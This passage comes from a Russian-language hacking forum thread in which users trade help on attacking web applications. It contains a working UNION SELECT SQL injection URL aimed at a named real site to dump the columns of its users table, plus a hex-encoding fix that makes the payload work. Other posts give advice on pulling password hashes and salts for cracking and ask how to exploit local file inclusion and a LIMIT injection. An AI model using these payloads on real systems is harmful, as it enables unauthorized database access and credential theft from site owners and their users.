ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.10.2011, 20:02
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от Mr.aids
Mr.aids said:
да я туплю опять жестоко. код который я привёл с md5 md5 salt это генерация нового пароля. а проверка и регистрация обычным способом идёт
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]safesql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] ) );[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]safesql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ) );[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] ); if([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sha1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DBHOST[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DBNAME[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'key'[/COLOR][COLOR="#007700"]] ) ) !=[/COLOR][COLOR="#0000BB"]$user_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]] ) die([/COLOR][COLOR="#DD0000"]'ID not valid!'[/COLOR][COLOR="#007700"]); if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/[\||\'|\|\[|\]|\"|\!|\?|\$|\@|\/|\\\|\&\~\*\{\+]/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]) ) die([/COLOR][COLOR="#DD0000"]'USER not valid!'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]super_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users WHERE name = '[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#DD0000"]' AND password='[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
md5 без соли. А можно как то сделать запрос что бы сделать апдейт? Никак ты апдейт не сделаешь в твоем случае! В MSSQL получилось бы. Лучше выдерни хэш и соль, и кинь в соответствующею темку расшифровки хешей.
|
|
|
11.10.2011, 22:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
всем привет.
я пока что новичок в sql уязвимостях, так вот никак не получается вывести столбцы из таблицы users
Код:
Code:
http://versos.ru/allautors/verso.html?id=-27+union+select+1,2,column_name,4,5+ from+information_schema.columns+where+table_name='users'+--+
хотя он и из любой таблицы не выводит...
Заранее спасибо. |
|
|
|
11.10.2011, 23:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
Сообщение от smirk
smirk said:
всем привет.
я пока что новичок в sql уязвимостях, так вот никак не получается вывести столбцы из таблицы users
Код:
Code:
http://versos.ru/allautors/verso.html?id=-27+union+select+1,2,column_name,4,5+ from+information_schema.columns+where+table_name='users'+--+
хотя он и из любой таблицы не выводит...
Заранее спасибо. для того чтобы вывести столбцы, переведи users в хекс,
тоисть так должно работать
Код:
Code:
http://versos.ru/allautors/verso.html?id=-27+union+select+1,2,column_name,4,5+ from+information_schema.columns+where+table_name=0x7573657273+--+
0х7573... без пробела!!!
|
|
|
|
12.10.2011, 00:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от pirat0
pirat0 said:
для того чтобы вывести столбцы, переведи users в хекс,
тоисть так должно работать
Код:
Code:
http://versos.ru/allautors/verso.html?id=-27+union+select+1,2,column_name,4,5+ from+information_schema.columns+where+table_name=0x7573657273+--+
0х7573... без пробела!!! хах точно, обычно просто users и т.д. буду знать.
Спасибо.
|
|
|
|
12.10.2011, 16:06
|
|
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762
Репутация:
-1
|
|
чем отличаеться функция include от функции require
к примеру есть ли тут уязвимость
хотя бы LFI с учетом того что PHP версии 5.3
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]included[/COLOR][COLOR="#007700"]()
{
[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'part'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'included'[/COLOR][COLOR="#007700"]];
require([/COLOR][COLOR="#0000BB"]PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/lib/temp/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'part'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'included'[/COLOR][COLOR="#007700"]]) .[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
|
|
|
|
12.10.2011, 16:19
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от ysmat
ysmat said:
чем отличаеться функция include от функции require
к примеру есть ли тут уязвимость
хотя бы LFI с учетом того что PHP версии 5.3
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]included[/COLOR][COLOR="#007700"]()
{
[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'part'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'included'[/COLOR][COLOR="#007700"]];
require([/COLOR][COLOR="#0000BB"]PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/lib/temp/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'part'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'included'[/COLOR][COLOR="#007700"]]) .[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
отличаются тем что, после того как функция require возвращает логический false скрипт останавливает работу фатально, а если include возвращает false то скрипт продолжает работу
грубо говоря, если подключаемый файл не найден или путь не верно то require завершит работу скрипта, а в случий include скрипт продолжает работу
в твоем примере инклуда нету
|
|
|
|
12.10.2011, 16:45
|
|
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762
Репутация:
-1
|
|
а почему нету $conf на самом деле $config это просто
моя опечатка
другое дело я не знаю как отсечь разширение .php
в 5.3 версии
ведь не нуль байт ни не его замена с большим количеством на слешей не работают
|
|
|
|
12.10.2011, 23:47
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Ребята кто шарит в скулях, подскажите плиз как сформировать правильно строку запроса
Сообщение от None
Error SQL !SELECT * FROM adclass WHERE active='on' ORDER BY updates DESC LIMIT -10, 10
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1
|
|
|
|
13.10.2011, 03:00
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от AKYLA
AKYLA said:
Ребята кто шарит в скулях, подскажите плиз как сформировать правильно строку запроса
SELECT * FROM adclass WHERE active='on' ORDER BY updates DESC LIMIT 10, 10
|
|
|
|
13.10.2011, 12:22
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от AKYLA
AKYLA said:
Ребята кто шарит в скулях, подскажите плиз как сформировать правильно строку запроса
Или как раскрутить? Раскрутить можно если только возможно чтение и запись файлов, а вместо -10, как я понял вы можете подставить любое слово. Злонамеренный код можно использовать как разделитель.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
